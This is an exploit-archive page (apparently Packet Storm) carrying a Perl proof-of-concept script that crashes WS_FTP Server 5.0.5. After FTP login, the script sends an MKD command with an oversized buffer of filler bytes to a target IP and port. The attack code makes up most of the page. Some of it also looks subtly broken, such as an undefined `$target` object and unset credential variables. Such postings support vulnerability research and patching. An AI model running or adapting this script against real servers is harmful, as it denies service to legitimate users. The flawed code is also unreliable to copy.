exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WS_FTP Server 5.0.5 Denial Of Service

WS_FTP Server 5.0.5 Denial Of Service
Posted Jan 30, 2024
Authored by Fernando Mengali

WS_FTP Server version 5.0.5 remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | b0ae7d2a65c936ec4e7b7587622a4bd90c91fed914ec8e7ea7930992434fb955

WS_FTP Server 5.0.5 Denial Of Service

Change Mirror Download
#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 30 january 2024
# Vendor Homepage: N/A
# Notification vendor: No reported
# Tested Version: 5.0.5
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denied of Service (DoS)

#1. Description about vunerability and exploited

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit we intentionally increased the number of bytes sent to the server to process.
#We concluded that the FTP server does not correctly manage the amount of data or bytes sent and processed, causing denied service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

$sis="$^O";

if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}

system("$cmd");

intro();
main();

my $exploit = "\x41"x676;
$exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e";
$exploit .= "\x42"x3000;
$exploit .= "\r\n";

my $sock = IO::Socket::INET->new(
PeerAddr => $target->$ip,
PeerPort => $target->$port,
Proto => 'tcp',
) or die "Not connect to $ip:$port: $!";

my $response = <$sock>;
print "Connected => $response";

$sock->send("USER $ftp_user\r\n");
$response = <$sock>;
print "Authentication USER: $response";

$sock->send("PASS $ftp_pass\r\n");
$response = <$sock>;
print "Authentication PASSWORD: $response";

$sock->send("MKD ".$exploit);
$response = <$sock>;
print "Exploited : $response";

sub intro {
print q {

---------- # ------------------------------------------------------------------
--------- ##= ------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) -------
-------- ##=== ----------------------------------------------------------------
------ ###==#=== --------------------------------------------------------------
---- ####===##==== ------------------------------------------------------------
-- #####====###===== ----- Coded by Fernando Mengali -----
- #####=====####===== ----- fernando.mengalli@gmail.com -----
- #####=====####===== ---------------------------------------------------------
--- ####= # #==== -------- Prepare to exploiting the server ------------
--------- ##= -----------------------------------------------------------------
------- ####=== ---------------------------------------------------------------

}
}

sub main {

our ($ip, $port) = @ARGV;

unless (defined($ip) && defined($port)) {

print " \nUsage: $0 <ip> <port> \n";
exit(-1);

}
}
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close